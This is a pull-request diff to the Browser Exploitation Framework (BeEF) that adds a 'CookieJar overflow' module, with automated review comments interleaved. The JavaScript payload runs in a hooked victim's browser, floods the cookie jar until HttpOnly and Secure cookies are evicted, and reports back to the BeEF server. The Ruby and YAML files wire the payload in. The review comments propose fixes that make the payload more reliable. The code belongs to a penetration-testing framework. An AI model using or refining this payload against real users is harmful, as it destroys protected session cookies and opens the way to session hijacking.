Merge pull request #963 from bmantra/master

Initial version of CookieJar overflow module.  And minor bugfix of active…  closes #935
This commit is contained in:
bmantra
2014-01-19 11:02:13 -08:00
4 changed files with 111 additions and 1 deletions


@@ -0,0 +1,79 @@
//
// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var preserveCookies = '<%= @preserveCookies %>'
var initialtimestamp;
var currenttimestamp;
var i = 0;
var preservedCookies;
function setCookie(cname,cvalue){
document.cookie = cname + "=" + cvalue;
}
function getCookie(cname){
var name = cname + "=";
var ca = document.cookie.split(';');
for(var i=0; i<ca.length; i++){
var c = ca[i].trim();
if (c.indexOf(name)==0) return c.substring(name.length,c.length);
}
return "";
}
function deleteAllCookies(){
var cookies = document.cookie.split(";");
if (cookies.length > 0){
var cookie = cookies[0];
var eqPos = cookie.indexOf("=");
var name = eqPos > -1 ? cookie.substr(0, eqPos) : cookie;
document.cookie = name + "=;expires=Thu, 01 Jan 1970 00:00:00 GMT";
if (cookies.length > 1){
//Timeout needed because otherwise cookie write loop freezes render thread
setTimeout(deleteAllCookies,1);
}
else{
if (preserveCookies){
var pc = preservedCookies.split(';');
for(var i=0; i<pc.length; i++){
var c = pc[i].trim();
document.cookie = c;
}
}
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'Attempt to overflow the Cookie Jar completed');
}
}
}
function overflowCookie() {
if(getCookie(initialtimestamp) === "BeEF") {
currenttimestamp = Date.now();
setCookie(currenttimestamp,"BeEF");
//Timeout needed because otherwise cookie write loop freezes render thread
setTimeout(overflowCookie, 1);
}
else{
deleteAllCookies();
}
}
function overflowCookieJar(){
preservedCookies = document.cookie;
initialtimestamp = Date.now();
setCookie(initialtimestamp,"BeEF");
overflowCookie();
}
overflowCookieJar();
});
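Review bot: `deleteAllCookies` has no termination bound: the expiry write `document.cookie = name + "=;expires=Thu, 01 Jan 1970 00:00:00 GMT"` carries no Path or Domain attribute, so a cookie scoped to another path or domain is never removed, `cookies.length > 1` stays true, and the `setTimeout(deleteAllCookies,1)` recursion runs forever without ever reaching the `beef.net.send` completion call; `overflowCookie` has the same shape if the browser never evicts the initial marker cookie. A bounded attempt counter keeps the module from hanging the hooked page, e.g. `var deleteAttempts = 0;` next to the other closure-level vars and `if (cookies.length > 1 && ++deleteAttempts < 5000){` in place of the existing condition, so it falls through to the restore-and-report branch (and the message could say whether the limit was hit). `preserveCookies` is an interpolated string literal, so if the unchecked state arrives from the datastore as `'false'` it is still truthy and the restore always runs; `var preserveCookies = '<%= @preserveCookies %>' === 'true';` would make the check honour the checkbox. The `var i = 0;` at the top of the closure is unused and shadowed by the loop counters inside `getCookie` and `deleteAllCookies`.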


@@ -0,0 +1,15 @@
#
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
overflow_cookiejar:
enable: true
category: ["Browser", "Hooked Domain"]
name: "Overflow Cookie Jar"
description: "This module attempts to perform John Wilander's CookieJar overflow. He demonstrated this in his <a href='https://www.owasp.org/index.php/OWASP_1-Liner'>Owasp 1-liner project</a>. With this module, cookies that have the HTTPOnly-flag and/or HTTPS-flag can be wiped. You can try to recreate these cookies afterwards as normal cookies."
authors: ["Bart Leppens"]
target:
working: ["S","C","FF","IE"]
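Review bot: The `description` does not say that the module is destructive for the hooked origin: every cookie on the domain is expired, and the optional restore re-sets only the `name=value` pairs captured from `document.cookie`, so Path, Domain, Expires and Secure attributes are lost and the re-created cookies are plain session cookies. "HTTPS-flag" presumably refers to the cookie `Secure` attribute; naming it by its attribute name avoids confusion. A sentence such as `Note: all cookies for the hooked domain are cleared; preserved cookies are re-created as session cookies without their original attributes.` appended to the description would set expectations for whoever reads the module list.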


@@ -0,0 +1,16 @@
#
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Overflow_cookiejar < BeEF::Core::Command
def self.options
return [
{'name' => 'preserveCookies', 'type' => 'checkbox', 'ui_label' => 'Attempt to preserve all non-httpOnly cookies', 'checked' => 'true'}
]
end
def post_execute
save({'result' => @datastore['result']})
end
end
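Review bot: `self.options` uses an explicit `return` in front of the array literal; Ruby returns the last expression, so the body can simply be the `[ { ... } ]` literal, with `return` reserved for early exits. The only option is undocumented; a comment above `self.options` such as `# preserveCookies: when checked, non-HttpOnly cookies captured before the overflow are re-set afterwards` would explain it. The checkbox value reaches the hook through the ERB template as a string, which the JavaScript side has to compare explicitly rather than test for truthiness.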


@@ -35,7 +35,7 @@ sendpayload = function(payload, uri, timeout, logdata){
this.send(ui8Data);
};
}
xhr.open("POST", url, true);
xhr.open("POST", uri, true);
xhr.setRequestHeader("Content-Type", "text/plain");
xhr.setRequestHeader('Accept','*/*');
xhr.setRequestHeader("Accept-Language", "en");